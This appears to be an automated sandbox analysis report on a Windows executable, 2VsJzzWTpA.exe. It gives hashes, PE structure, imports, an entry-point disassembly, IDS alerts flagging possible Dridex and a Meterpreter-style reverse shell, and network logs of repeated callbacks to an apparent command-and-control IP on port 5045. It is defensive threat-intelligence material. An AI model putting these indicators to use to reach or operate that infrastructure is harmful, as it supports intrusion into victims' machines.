              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
              • Not all processes were analyzed; the report is missing behavior information
              • Report size getting too big, too many NtOpenKeyEx calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.
              No simulations
              No context
              Match | Associated Sample Name / URL | Detection | Threat Name | Context
              bg.microsoft.map.fastly.net | YJaaZuNHwI.exe | malicious | Quasar | 199.232.210.172
              bg.microsoft.map.fastly.net | O782uurN5d.exe | malicious | DCRat | 199.232.210.172
              bg.microsoft.map.fastly.net | bKxtUOPLtR.exe | malicious | AveMaria, DcRat, KeyLogger, StormKitty, VenomRAT | 199.232.210.172
              bg.microsoft.map.fastly.net | 46VHQmFDxC.exe | malicious | RedLine | 199.232.210.172
              bg.microsoft.map.fastly.net | vEtDFkAZjO.exe | malicious | RL STEALER, StormKitty | 199.232.214.172
              bg.microsoft.map.fastly.net | GYede3Gwn0.lnk | malicious | Unknown | 199.232.210.172
              bg.microsoft.map.fastly.net | Qu3ped8inH.exe | malicious | Unknown | 199.232.210.172
              bg.microsoft.map.fastly.net | DIS_37745672.pdf | malicious | KnowBe4, PDFPhish | 199.232.214.172
              bg.microsoft.map.fastly.net | https://gogl.to/3HGT | malicious | CAPTCHA Scam ClickFix, DcRat, KeyLogger, StormKitty, VenomRAT | 199.232.214.172
              Match | Associated Sample Name / URL | Detection | Threat Name | Context
              CNNIC-TENCENT-NET-APShenzhenTencentComputerSystemsCompa | S17.exe | malicious | Unknown | 192.144.128.212
              CNNIC-TENCENT-NET-APShenzhenTencentComputerSystemsCompa | loligang.ppc.elf | malicious | Mirai | 106.55.194.191
              CNNIC-TENCENT-NET-APShenzhenTencentComputerSystemsCompa | db0fa4b8db0333367e9bda3ab68b8042.m68k.elf | malicious | Mirai, Gafgyt | 111.231.124.162
              CNNIC-TENCENT-NET-APShenzhenTencentComputerSystemsCompa | 7wOqCnSoTo.exe | malicious | GhostRat | 106.54.31.97
              CNNIC-TENCENT-NET-APShenzhenTencentComputerSystemsCompa | db0fa4b8db0333367e9bda3ab68b8042.i686.elf | malicious | Mirai, Gafgyt | 118.28.147.172
              CNNIC-TENCENT-NET-APShenzhenTencentComputerSystemsCompa | db0fa4b8db0333367e9bda3ab68b8042.sh4.elf | malicious | Mirai, Gafgyt | 49.235.142.203
              CNNIC-TENCENT-NET-APShenzhenTencentComputerSystemsCompa | db0fa4b8db0333367e9bda3ab68b8042.spc.elf | malicious | Mirai, Gafgyt | 150.158.255.197
              CNNIC-TENCENT-NET-APShenzhenTencentComputerSystemsCompa | telnet.arm.elf | malicious | Unknown | 106.53.85.48
              CNNIC-TENCENT-NET-APShenzhenTencentComputerSystemsCompa | telnet.sh4.elf | malicious | Unknown | 129.211.52.2
              No context
              No context
              Process:C:\Users\user\Desktop\2VsJzzWTpA.exe
              File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
              Category:dropped
              Size (bytes):71954
              Entropy (8bit):7.996617769952133
              Encrypted:true
              SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
              MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
              SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
              SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
              SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
              Malicious:false
              Reputation:high, very likely benign file
              Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...
              Process:C:\Users\user\Desktop\2VsJzzWTpA.exe
              File Type:data
              Category:modified
              Size (bytes):328
              Entropy (8bit):3.2539954282295116
              Encrypted:false
              SSDEEP:6:kKNi9UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:7DImsLNkPlE99SNxAhUe/3
              MD5:038A9B4AA971D3409D883D136BEA216C
              SHA1:D44D6C76E44CAA9A1E49785192504541C654013F
              SHA-256:4E2A385DCE43B1B1307264A22B6046CC960ADD08FE0A8B525C651026A68CB8B3
              SHA-512:4CC79FDBAF8E1AA1C9B302C7ADE126303A5E7EEE2AB5AD0CDB4F267B7E30A180DE481AFAA8145BD57633EC028A3323248BF65D0E6839985FA34967CC1D139FDA
              Malicious:false
              Reputation:low
              Preview:p...... ...........!.[..(....................................................... ........G..@.......&......X........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...
              File type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
              Entropy (8bit):7.210541561725813
              TrID:
              • Win64 Executable (generic) (12005/4) 74.80%
              • Generic Win/DOS Executable (2004/3) 12.49%
              • DOS Executable Generic (2002/1) 12.47%
              • VXD Driver (31/22) 0.19%
              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.04%
              File name:2VsJzzWTpA.exe
              File size:328'704 bytes
              MD5:791bbe51360bb7afbe10c8daf7ad6b5c
              SHA1:8f6382479337d8dc829865d72ba6ea02144e0d92
              SHA256:879a5b13745db634a276624a5c476ede618ba844da42d3ec614aafc45051d474
              SHA512:cbf36ccd7528bc05ed718143aa7613c7b665107192af0409bfe8ad7752bff4c79b7242607b4963fe84167c88aa63d9f2fe756d6ea00f85e6a613b421224479af
              SSDEEP:6144:W9jBse4AtsF8zdciLQkln3l0DxUwqemL4E9UMAwu9J:QlN4p8wcn+6wqemLlqd9
              TLSH:73648C71BB4D6FF2D23F3AB5C5732829004FE0DC1B10A60D74AE66DF659261836A27E1
              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d................./...."."....................@..............................p......_......... ............................
              Icon Hash:90cececece8e8eb0
              Entrypoint:0x4014c0
              Entrypoint Section:.text
              Digitally signed:false
              Imagebase:0x400000
              Subsystem:windows gui
              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, DEBUG_STRIPPED
              DLL Characteristics:
              Time Stamp:0x0 [Thu Jan 1 00:00:00 1970 UTC]
              TLS Callbacks:0x401ba0
              CLR (.Net) Version:
              OS Version Major:4
              OS Version Minor:0
              File Version Major:4
              File Version Minor:0
              Subsystem Version Major:4
              Subsystem Version Minor:0
              Import Hash:147442e63270e287ed57d33257638324
              Instruction
              dec eax
              sub esp, 28h
              dec eax
              mov eax, dword ptr [0004EFF5h]
              mov dword ptr [eax], 00000001h
              call 00007F46511EE72Fh
              call 00007F46511EDF1Ah
              nop
              nop
              dec eax
              add esp, 28h
              ret
              nop word ptr [eax+eax+00000000h]
              nop dword ptr [eax]
              dec eax
              sub esp, 28h
              dec eax
              mov eax, dword ptr [0004EFC5h]
              mov dword ptr [eax], 00000000h
              call 00007F46511EE6FFh
              call 00007F46511EDEEAh
              nop
              nop
              dec eax
              add esp, 28h
              ret
              nop word ptr [eax+eax+00000000h]
              nop dword ptr [eax]
              dec eax
              sub esp, 28h
              call 00007F46511EFBC4h
              dec eax
              test eax, eax
              sete al
              movzx eax, al
              neg eax
              dec eax
              add esp, 28h
              ret
              nop
              nop
              nop
              nop
              nop
              nop
              nop
              dec eax
              lea ecx, dword ptr [00000009h]
              jmp 00007F46511EE249h
              nop dword ptr [eax+00h]
              ret
              nop
              nop
              nop
              nop
              nop
              nop
              nop
              nop
              nop
              nop
              nop
              nop
              nop
              nop
              nop
              dec eax
              jmp ecx
              dec eax
              arpl word ptr [00002AC2h], ax
              test eax, eax
              jle 00007F46511EE298h
              cmp dword ptr [00002ABBh], 00000000h
              jle 00007F46511EE28Fh
              dec eax
              mov edx, dword ptr [00052CFEh]
              dec eax
              mov dword ptr [ecx+eax], edx
              dec eax
              mov edx, dword ptr [00052CFBh]
              Name | Virtual Address | Virtual Size | Is in Section
              IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
              IMAGE_DIRECTORY_ENTRY_IMPORT | 0x54000 | 0x8d8 | .idata
              IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
              IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x51000 | 0x2b8 | .pdata
              IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
              IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
              IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
              IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
              IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
              IMAGE_DIRECTORY_ENTRY_TLS | 0x50060 | 0x28 | .rdata
              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
              IMAGE_DIRECTORY_ENTRY_IAT | 0x54224 | 0x1e8 | .idata
              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
              IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
              Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
              .text | 0x1000 | 0x20a8 | 0x2200 | ba98beafce4128c14539a20f3e854b25 | False | 0.5734145220588235 | data | 6.010394259460846 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              .data | 0x4000 | 0x4bcf0 | 0x4be00 | 3657df1c0b88083fa5395ad85b6c1710 | False | 0.6237354561367381 | dBase III DBT, version number 0, next free block index 10, 1st item "\326+Q\031\326+Q\031\326+Q\031\326\300R\031\246+Q\031\326+Q\031\326+Q\031\326\013R\031\246-Q\031\326+Q\031\326+Q\031\326+Q\031\326+Q\031\326+Q\031\326+Q\031\370_4a\242+Q\031T*R\031\326;Q\031\326)R\031\326/Q\031\326+Q\031\326+Q\031\326+Q\031\366+Qy\370Y5x\242JQ\031\324\327Q\031\326\013R\031\326\325Q\031\326-R\031\326+Q" | 7.200243030330314 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              .rdata | 0x50000 | 0x910 | 0xa00 | 5fcc7830b4dcd602b35eeb7f1712e8fa | False | 0.241796875 | data | 4.459688665734325 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
              .pdata | 0x51000 | 0x2b8 | 0x400 | f88aef14dea168f37249daf0dce04c78 | False | 0.37890625 | data | 3.2311971178670404 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
              .xdata | 0x52000 | 0x238 | 0x400 | 6ce9e303fb86766d702ecb2b174cf348 | False | 0.2578125 | data | 2.6337753778508075 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
              .bss | 0x53000 | 0x9d0 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              .idata | 0x54000 | 0x8d8 | 0xa00 | 3aae8d98b4d34bad008e73a14573bffd | False | 0.323828125 | data | 3.966749721413537 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              .idata0x540000x8d80xa003aae8d98b4d34bad008e73a14573bffdFalse0.323828125data3.966749721413537IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              .CRT0x550000x680x20052d79e9aecf5d5c3145d3ec54aa197a8False0.0703125data0.2709192282599745IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              .tls0x560000x100x200bf619eac0cdf3f68d496ea9344137e8bFalse0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
               DLL | Import
               KERNEL32.dll | CloseHandle, ConnectNamedPipe, CreateFileA, CreateNamedPipeA, CreateThread, DeleteCriticalSection, EnterCriticalSection, GetCurrentProcess, GetCurrentProcessId, GetCurrentThreadId, GetLastError, GetModuleHandleA, GetProcAddress, GetStartupInfoA, GetSystemTimeAsFileTime, GetTickCount, InitializeCriticalSection, LeaveCriticalSection, QueryPerformanceCounter, ReadFile, RtlAddFunctionTable, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, SetUnhandledExceptionFilter, Sleep, TerminateProcess, TlsGetValue, UnhandledExceptionFilter, VirtualAlloc, VirtualProtect, VirtualQuery, WriteFile
               msvcrt.dll | __C_specific_handler, __getmainargs, __initenv, __iob_func, __lconv_init, __set_app_type, __setusermatherr, _acmdln, _amsg_exit, _cexit, _fmode, _initterm, _onexit, abort, calloc, exit, fprintf, free, fwrite, malloc, memcpy, signal, sprintf, strlen, strncmp, vfprintf
               Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
               2025-01-01T02:04:38.651886+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.4 | 49730 | 134.175.121.153 | 5045 | TCP
               2025-01-01T02:04:40.182365+0100 | 2035651 | ET MALWARE Meterpreter or Other Reverse Shell SSL Cert | 1 | 134.175.121.153 | 5045 | 192.168.2.4 | 49730 | TCP
               2025-01-01T02:05:41.997698+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.4 | 52520 | 134.175.121.153 | 5045 | TCP
               2025-01-01T02:06:43.735723+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.4 | 52760 | 134.175.121.153 | 5045 | TCP
               Timestamp | Source Port | Dest Port | Source IP | Dest IP
               Jan 1, 2025 02:04:37.744956017 CET | 49730 | 5045 | 192.168.2.4 | 134.175.121.153
               Jan 1, 2025 02:04:37.751998901 CET | 5045 | 49730 | 134.175.121.153 | 192.168.2.4
               Jan 1, 2025 02:04:37.752088070 CET | 49730 | 5045 | 192.168.2.4 | 134.175.121.153
               Jan 1, 2025 02:04:37.761851072 CET | 49730 | 5045 | 192.168.2.4 | 134.175.121.153
               Jan 1, 2025 02:04:37.768132925 CET | 5045 | 49730 | 134.175.121.153 | 192.168.2.4
               Jan 1, 2025 02:04:38.651818991 CET | 5045 | 49730 | 134.175.121.153 | 192.168.2.4
               Jan 1, 2025 02:04:38.651885986 CET | 49730 | 5045 | 192.168.2.4 | 134.175.121.153
               Jan 1, 2025 02:04:38.979347944 CET | 5045 | 49730 | 134.175.121.153 | 192.168.2.4
               Jan 1, 2025 02:04:38.979398012 CET | 49730 | 5045 | 192.168.2.4 | 134.175.121.153
               Jan 1, 2025 02:04:40.177510977 CET | 49730 | 5045 | 192.168.2.4 | 134.175.121.153
               Jan 1, 2025 02:04:40.182364941 CET | 5045 | 49730 | 134.175.121.153 | 192.168.2.4
               Jan 1, 2025 02:04:40.495101929 CET | 5045 | 49730 | 134.175.121.153 | 192.168.2.4
               Jan 1, 2025 02:04:40.495177031 CET | 49730 | 5045 | 192.168.2.4 | 134.175.121.153
               Jan 1, 2025 02:04:40.767712116 CET | 5045 | 49730 | 134.175.121.153 | 192.168.2.4
               Jan 1, 2025 02:04:40.767765999 CET | 49730 | 5045 | 192.168.2.4 | 134.175.121.153
               Jan 1, 2025 02:04:40.770632982 CET | 49730 | 5045 | 192.168.2.4 | 134.175.121.153
               Jan 1, 2025 02:04:40.775460005 CET | 5045 | 49730 | 134.175.121.153 | 192.168.2.4
               Jan 1, 2025 02:04:41.088449955 CET | 5045 | 49730 | 134.175.121.153 | 192.168.2.4
               Jan 1, 2025 02:04:41.088640928 CET | 5045 | 49730 | 134.175.121.153 | 192.168.2.4
               Jan 1, 2025 02:04:41.088643074 CET | 49730 | 5045 | 192.168.2.4 | 134.175.121.153
               Jan 1, 2025 02:04:41.088689089 CET | 49730 | 5045 | 192.168.2.4 | 134.175.121.153
               Jan 1, 2025 02:05:10.702785969 CET | 52489 | 53 | 192.168.2.4 | 162.159.36.2
               Jan 1, 2025 02:05:10.707655907 CET | 53 | 52489 | 162.159.36.2 | 192.168.2.4
               Jan 1, 2025 02:05:10.707719088 CET | 52489 | 53 | 192.168.2.4 | 162.159.36.2
               Jan 1, 2025 02:05:10.712645054 CET | 53 | 52489 | 162.159.36.2 | 192.168.2.4
               Jan 1, 2025 02:05:11.161652088 CET | 52489 | 53 | 192.168.2.4 | 162.159.36.2
               Jan 1, 2025 02:05:11.166604996 CET | 53 | 52489 | 162.159.36.2 | 192.168.2.4
               Jan 1, 2025 02:05:11.166650057 CET | 52489 | 53 | 192.168.2.4 | 162.159.36.2
               Jan 1, 2025 02:05:41.102159977 CET | 52520 | 5045 | 192.168.2.4 | 134.175.121.153
               Jan 1, 2025 02:05:41.107044935 CET | 5045 | 52520 | 134.175.121.153 | 192.168.2.4
               Jan 1, 2025 02:05:41.107129097 CET | 52520 | 5045 | 192.168.2.4 | 134.175.121.153
               Jan 1, 2025 02:05:41.107368946 CET | 52520 | 5045 | 192.168.2.4 | 134.175.121.153
               Jan 1, 2025 02:05:41.112158060 CET | 5045 | 52520 | 134.175.121.153 | 192.168.2.4
               Jan 1, 2025 02:05:41.112288952 CET | 5045 | 52520 | 134.175.121.153 | 192.168.2.4
               Jan 1, 2025 02:05:41.997642994 CET | 5045 | 52520 | 134.175.121.153 | 192.168.2.4
               Jan 1, 2025 02:05:41.997698069 CET | 52520 | 5045 | 192.168.2.4 | 134.175.121.153
               Jan 1, 2025 02:05:42.269990921 CET | 5045 | 52520 | 134.175.121.153 | 192.168.2.4
               Jan 1, 2025 02:05:42.270060062 CET | 52520 | 5045 | 192.168.2.4 | 134.175.121.153
               Jan 1, 2025 02:05:42.270380020 CET | 52520 | 5045 | 192.168.2.4 | 134.175.121.153
               Jan 1, 2025 02:05:42.275443077 CET | 5045 | 52520 | 134.175.121.153 | 192.168.2.4
               Jan 1, 2025 02:05:42.322798014 CET | 52520 | 5045 | 192.168.2.4 | 134.175.121.153
               Jan 1, 2025 02:05:42.327600956 CET | 5045 | 52520 | 134.175.121.153 | 192.168.2.4
               Jan 1, 2025 02:05:42.815784931 CET | 5045 | 52520 | 134.175.121.153 | 192.168.2.4
               Jan 1, 2025 02:05:42.815840006 CET | 52520 | 5045 | 192.168.2.4 | 134.175.121.153
               Jan 1, 2025 02:05:42.815937042 CET | 5045 | 52520 | 134.175.121.153 | 192.168.2.4
               Jan 1, 2025 02:05:42.815973997 CET | 52520 | 5045 | 192.168.2.4 | 134.175.121.153
               Jan 1, 2025 02:06:27.726991892 CET | 52520 | 5045 | 192.168.2.4 | 134.175.121.153
               Jan 1, 2025 02:06:27.732144117 CET | 5045 | 52520 | 134.175.121.153 | 192.168.2.4
               Jan 1, 2025 02:06:27.743396044 CET | 49730 | 5045 | 192.168.2.4 | 134.175.121.153
               Jan 1, 2025 02:06:28.054816008 CET | 49730 | 5045 | 192.168.2.4 | 134.175.121.153
               Jan 1, 2025 02:06:28.664174080 CET | 49730 | 5045 | 192.168.2.4 | 134.175.121.153
               Jan 1, 2025 02:06:29.867305994 CET | 49730 | 5045 | 192.168.2.4 | 134.175.121.153
               Jan 1, 2025 02:06:32.273555994 CET | 49730 | 5045 | 192.168.2.4 | 134.175.121.153
               Jan 1, 2025 02:06:37.086045027 CET | 49730 | 5045 | 192.168.2.4 | 134.175.121.153
               Jan 1, 2025 02:06:42.821366072 CET | 52760 | 5045 | 192.168.2.4 | 134.175.121.153
               Jan 1, 2025 02:06:42.826366901 CET | 5045 | 52760 | 134.175.121.153 | 192.168.2.4
               Jan 1, 2025 02:06:42.826435089 CET | 52760 | 5045 | 192.168.2.4 | 134.175.121.153
               Jan 1, 2025 02:06:42.826683998 CET | 52760 | 5045 | 192.168.2.4 | 134.175.121.153
               Jan 1, 2025 02:06:42.831445932 CET | 5045 | 52760 | 134.175.121.153 | 192.168.2.4
               Jan 1, 2025 02:06:43.735660076 CET | 5045 | 52760 | 134.175.121.153 | 192.168.2.4
               Jan 1, 2025 02:06:43.735723019 CET | 52760 | 5045 | 192.168.2.4 | 134.175.121.153
               Jan 1, 2025 02:06:44.012104988 CET | 5045 | 52760 | 134.175.121.153 | 192.168.2.4
               Jan 1, 2025 02:06:44.012181997 CET | 52760 | 5045 | 192.168.2.4 | 134.175.121.153
               Jan 1, 2025 02:06:44.012512922 CET | 52760 | 5045 | 192.168.2.4 | 134.175.121.153
               Jan 1, 2025 02:06:44.013806105 CET | 52760 | 5045 | 192.168.2.4 | 134.175.121.153
               Jan 1, 2025 02:06:44.017297029 CET | 5045 | 52760 | 134.175.121.153 | 192.168.2.4
               Jan 1, 2025 02:06:44.018644094 CET | 5045 | 52760 | 134.175.121.153 | 192.168.2.4
               Jan 1, 2025 02:06:44.566857100 CET | 5045 | 52760 | 134.175.121.153 | 192.168.2.4
               Jan 1, 2025 02:06:44.567022085 CET | 52760 | 5045 | 192.168.2.4 | 134.175.121.153
               Jan 1, 2025 02:06:44.567081928 CET | 5045 | 52760 | 134.175.121.153 | 192.168.2.4
               Jan 1, 2025 02:06:44.567132950 CET | 52760 | 5045 | 192.168.2.4 | 134.175.121.153
               Jan 1, 2025 02:06:46.695494890 CET | 49730 | 5045 | 192.168.2.4 | 134.175.121.153
               Timestamp | Source Port | Dest Port | Source IP | Dest IP
               Jan 1, 2025 02:05:10.702302933 CET | 53 | 50058 | 162.159.36.2 | 192.168.2.4
               Jan 1, 2025 02:05:11.170135975 CET | 58521 | 53 | 192.168.2.4 | 1.1.1.1
               Jan 1, 2025 02:05:11.177144051 CET | 53 | 58521 | 1.1.1.1 | 192.168.2.4
               Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
               Jan 1, 2025 02:05:11.170135975 CET | 192.168.2.4 | 1.1.1.1 | 0x9165 | Standard query (0) | 198.187.3.20.in-addr.arpa | PTR (Pointer record) | IN (0x0001) | false
               Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
               Jan 1, 2025 02:04:39.348314047 CET | 1.1.1.1 | 192.168.2.4 | 0x551b | No error (0) | bg.microsoft.map.fastly.net | | 199.232.214.172 | A (IP address) | IN (0x0001) | false
               Jan 1, 2025 02:04:39.348314047 CET | 1.1.1.1 | 192.168.2.4 | 0x551b | No error (0) | bg.microsoft.map.fastly.net | | 199.232.210.172 | A (IP address) | IN (0x0001) | false
